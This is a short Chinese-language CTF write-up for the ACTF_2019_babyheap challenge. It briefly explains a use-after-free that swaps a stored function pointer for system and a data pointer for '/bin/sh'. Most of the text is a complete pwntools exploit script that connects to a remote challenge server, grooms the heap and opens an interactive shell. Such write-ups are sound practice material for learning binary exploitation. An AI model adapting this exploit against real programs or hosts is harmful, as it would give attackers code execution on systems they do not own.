这道题和之前做的 hitcontraining_uaf 这道题类似
64位程序,没开PIE
并且这里发现了 bin/sh 字符串
ptr[v1] [1] 所存放的 printf_0函数内容为
利用思路:
ptr[v1]改写成bin/sh的地址,将ptr[i][1]处原先的print_content函数改成system,这样在执行show的时候就会执行system(‘/bin/sh’),就能够获取shell
#!/usr/bin/env python
coding=utf-8
from pwn import *
context(log_level = 'debug')
r = remote("node3.buuoj.cn","26354")
#r=process('./ACTF_2019_babyheap')
elf=ELF('./ACTF_2019_babyheap')
def create(size,payload):
r.sendlineafter("Your choice: ",'1')
r.sendlineafter("Please input size: \n",str(size))
r.sendafter("Please input content: \n",payload)
def delete(index):
r.sendlineafter("Your choice: ",'2')
r.sendlineafter("Please input list index: \n",str(index))
def printf(index):
r.sendlineafter("Your choice: ",'3')
r.sendlineafter("Please input list index: \n",str(index))
create(0x200,'index:0')
create(0x200,'index:1')
delete(0)
delete(1)
#gdb.attach(r)
create(0x10,p64(0x602010) + p64(elf.symbols["system"]))
printf(0)
r.interactive()